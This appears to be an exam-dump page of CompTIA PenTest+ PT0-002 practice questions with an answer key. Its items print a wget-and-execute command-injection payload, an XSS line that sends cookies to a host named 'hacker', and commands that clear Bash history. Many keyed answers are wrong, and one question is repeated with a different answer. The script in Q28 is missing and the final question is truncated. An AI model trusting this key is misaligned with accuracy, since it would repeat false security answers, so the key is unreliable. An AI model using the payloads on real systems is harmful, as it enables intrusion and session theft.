[2022 Latest] Try the Free Site's Materials for the Best PT0-002 Exam Question Set [Q13-Q36]

Download the free CompTIA PenTest+ PT0-002 official certification guide PDF

Question 13
A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized:
exploit = "POST "
exploit += "/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS} -c${IFS}'cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS}apache;${IFS}./apache'%0A%27&loginUser=a&Pwd=a"
exploit += "HTTP/1.1"
Which of the following commands should the penetration tester run post-engagement?

  • A. rm -rf /tmp/apache
  • B. grep -v apache ~/.bash_history > ~/.bash_history
  • C. taskkill /IM "apache" /F
  • D. chmod 600 /tmp/apache

Correct answer: A

Question 14
Which of the following BEST describes why a client would hold a lessons-learned meeting with the penetration-testing team?

  • A. To determine any processes that failed to meet expectations during the assessment
  • B. To provide feedback on the report structure and recommend improvements
  • C. To ensure the penetration-testing team destroys all company data that was gathered during the test
  • D. To discuss the findings and dispute any false positives

Correct answer: A

Question 15
A company's Chief Executive Officer has created a secondary home office and is concerned that the WiFi service being used is vulnerable to an attack. A penetration tester is hired to test the security of the WiFi's router.
Which of the following is MOST vulnerable to a brute-force attack?

  • A. WPA2-EAP
  • B. WPA2-PSK
  • C. WPS
  • D. WPA-TKIP

Correct answer: C

Question 16
Which of the following should a penetration tester consider FIRST when engaging in a penetration test in a cloud environment?

  • A. Whether the cloud service provider allows the penetration tester to test the environment
  • B. The geographical location where the cloud services are running
  • C. Whether the specific cloud services are being used by the application
  • D. Whether the country where the cloud service is based has any impeding laws

Correct answer: A

Question 17
Given the following code:
<SCRIPT>var+img=new+Image();img.src="http://hacker/%20+%20document.cookie;</SCRIPT>
Which of the following are the BEST methods to prevent this type of attack? (Choose two.)

  • A. Session tokens
  • B. Parameterized queries
  • C. Input validation
  • D. Web-application firewall
  • E. Output encoding
  • F. Base64 encoding

Correct answer: A,B

Question 18
A penetration tester found the following valid URL while doing a manual assessment of a web application:
http://www.example.com/product.php?id=123987.
Which of the following automated tools would be best to use NEXT to try to identify a vulnerability in this URL?

  • A. DirBuster
  • B. Nikto
  • C. SQLmap
  • D. Nessus

Correct answer: D

Question 19
A penetration tester has obtained shell access to a Windows host and wants to run a specially crafted binary for later execution using the wmic.exe process call create function. Which of the following OS or filesystem mechanisms is MOST likely to support this objective?

  • A. PsExec
  • B. Alternate data streams
  • C. PowerShell modules
  • D. MP4 steganography

Correct answer: A

Question 20
A penetration tester has completed an analysis of the various software products produced by the company under assessment. The tester found that over the past several years the company has been including vulnerable third-party modules in multiple products, even though the quality of the organic code being developed is very good. Which of the following recommendations should the penetration tester include in the report?

  • A. Add a dependency checker into the tool chain.
  • B. Validate API security settings before deployment.
  • C. Perform fuzz testing of compiled binaries.
  • D. Perform routine static and dynamic analysis of committed code.

Correct answer: C

Question 21
A company that develops embedded software for the automobile industry has hired a penetration-testing team to evaluate the security of its products prior to delivery. The penetration-testing team has stated its intent to subcontract to a reverse-engineering team capable of analyzing binaries to develop proof-of-concept exploits. The software company has requested additional background investigations on the reverse-engineering team prior to approval of the subcontract. Which of the following concerns would BEST support the software company's request?

  • A. The reverse-engineering team may have a history of selling exploits to third parties.
  • B. The reverse-engineering team may use closed-source or other non-public information feeds for its analysis.
  • C. The reverse-engineering team may not instill safety protocols sufficient for the automobile industry.
  • D. The reverse-engineering team will be given access to source code for analysis.

Correct answer: A

Question 22
A company is concerned that its cloud service provider is not adequately protecting the VMs housing its software development. The VMs are housed in a datacenter with other companies sharing physical resources.
Which of the following attack types is MOST concerning to the company?

  • A. Side channel
  • B. Session riding
  • C. Data flooding
  • D. Cybersquatting

Correct answer: B

Question 23
A penetration tester gains access to a system and establishes persistence, and then runs the following commands:
cat /dev/null > temp
touch -r .bash_history temp
mv temp .bash_history
Which of the following actions is the tester MOST likely performing?

  • A. Making decoy files on the system to confuse incident responders
  • B. Redirecting Bash history to /dev/null
  • C. Covering tracks by clearing the Bash history
  • D. Making a copy of the user's Bash history for further enumeration

Correct answer: C

Question 24
A penetration tester has been given eight business hours to gain access to a client's financial system. Which of the following techniques will have the highest likelihood of success?

  • A. Using a brute-force attack against the external perimeter to gain a foothold
  • B. Dropping a malicious USB key with the company's logo in the parking lot
  • C. Attempting to tailgate an employee going into the client's workplace
  • D. Performing spear phishing against employees by posing as senior management

Correct answer: A

Question 25
A company is concerned that its cloud VM is vulnerable to a cyberattack and proprietary data may be stolen.
A penetration tester determines a vulnerability does exist and exploits the vulnerability by adding a fake VM instance to the IaaS component of the client's VM. Which of the following cloud attacks did the penetration tester MOST likely implement?

  • A. Direct-to-origin
  • B. Credential harvesting
  • C. Cross-site scripting
  • D. Malware injection

Correct answer: A

Question 26
A penetration tester who is doing a company-requested assessment would like to send traffic to another system using double tagging. Which of the following techniques would BEST accomplish this goal?

  • A. Tag nesting
  • B. Meta tagging
  • C. RFID tagging
  • D. RFID cloning

Correct answer: B

Question 27
User credentials were captured from a database during an assessment and cracked using rainbow tables. Based on the ease of compromise, which of the following algorithms was MOST likely used to store the passwords in the database?

  • A. PBKDF2
  • B. bcrypt
  • C. SHA-1
  • D. MD5

Correct answer: D

Question 28
A penetration tester wrote the following script to be used in one engagement:

Which of the following actions will this script perform?

  • A. Look for open ports.
  • B. Listen for a reverse shell.
  • C. Create an encrypted tunnel.
  • D. Attempt to flood open ports.

Correct answer: A

Question 29
A company becomes concerned when the security alarms are triggered during a penetration test. Which of the following should the company do NEXT?

  • A. Halt the penetration test.
  • B. Assume the alert is from the penetration test.
  • C. Conduct an incident response.
  • D. Deconflict with the penetration tester.

Correct answer: C

Question 30
Which of the following is the MOST effective person to validate results from a penetration test?

  • A. Chief Information Officer
  • B. Team leader
  • C. Client
  • D. Third party

Correct answer: B

Question 31
A company that develops embedded software for the automobile industry has hired a penetration-testing team to evaluate the security of its products prior to delivery. The penetration-testing team has stated its intent to subcontract to a reverse-engineering team capable of analyzing binaries to develop proof-of-concept exploits. The software company has requested additional background investigations on the reverse-engineering team prior to approval of the subcontract. Which of the following concerns would BEST support the software company's request?

  • A. The reverse-engineering team will be given access to source code for analysis.
  • B. The reverse-engineering team may use closed-source or other non-public information feeds for its analysis.
  • C. The reverse-engineering team may not instill safety protocols sufficient for the automobile industry.
  • D. The reverse-engineering team may have a history of selling exploits to third parties.

Correct answer: A

Question 32
A red team gained access to the internal network of a client during an engagement and used the Responder tool to capture important data. Which of the following was captured by the testing team?

  • A. User hashes sent over SMB
  • B. Multiple handshakes
  • C. Encrypted file transfers
  • D. IP addresses

Correct answer: A

Question 33
A penetration tester is preparing to perform activities for a client that requires minimal disruption to company operations. Which of the following are considered passive reconnaissance tools? (Choose two.)

  • A. Retina
  • B. Shodan
  • C. Nikto
  • D. Burp Suite
  • E. Nessus
  • F. Wireshark

Correct answer: B,F

Question 34
Which of the following web-application security risks are part of the OWASP Top 10 v2017? (Choose two.)

  • A. Buffer overflows
  • B. Ransomware attacks
  • C. Race-condition attacks
  • D. Zero-day attacks
  • E. Injection flaws
  • F. Cross-site scripting

Correct answer: A,F

Question 35
A penetration tester discovers that a web server within the scope of the engagement has already been compromised with a backdoor. Which of the following should the penetration tester do NEXT?

  • A. Continue the engagement and include the backdoor finding in the final report
  • B. Inform the customer immediately about the backdoor
  • C. Forensically acquire the backdoor Trojan and perform attribution
  • D. Utilize the backdoor in support of the engagement

Correct answer: B

Question 36
......

CompTIA PT0-002 official certification guide PDF: https://www.goshiken.com/CompTIA/PT0-002-mondaishu.html

The CompTIA PenTest+ Certification PT0-002 exam question set is available here: https://drive.google.com/open?id=1DPaJ7JtaMgcHIQq0772pDt7PLCtzojWy